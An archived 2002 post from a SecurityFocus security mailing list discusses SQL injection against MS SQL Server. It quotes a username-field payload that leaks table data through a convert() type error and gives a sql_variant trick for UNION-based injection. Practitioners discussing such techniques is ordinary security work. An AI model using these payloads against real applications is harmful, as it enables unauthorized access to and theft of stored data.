From: Deus, Attonbitus (Thor@HammerofGod.com)
Date: Fri May 10 2002 - 12:23:55 EDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
At 10:38 PM 5/9/2002, Kevin Spett wrote:
>SELECT column must have the same data type. Try using the convert() hack to
>get around this whole issue, like this:
>
>username=invalidusername' + convert(int, (SELECT TOP 1 UserName FROM
>tblUsers WHERE Username > 'a')) + ''--
On a side note, MS SQL introduced the 'variant' datatype which will keep
you from having to determine the actual column datatype by converting it
for you as in:
'Union select convert(sql_variant,1),...' instead of 'union select 1,1,1,1...)
Saves time for those in a hurry ;)
AD
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPNv0G4hsmyD15h5gEQKZUQCg3gRzSKlqAOxVq7YYJ0bjESAaFDkAoLn0
8d8FuEPvTaC+7hXnDh/kAYPw
=e28e
-----END PGP SIGNATURE-----
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:21 EDT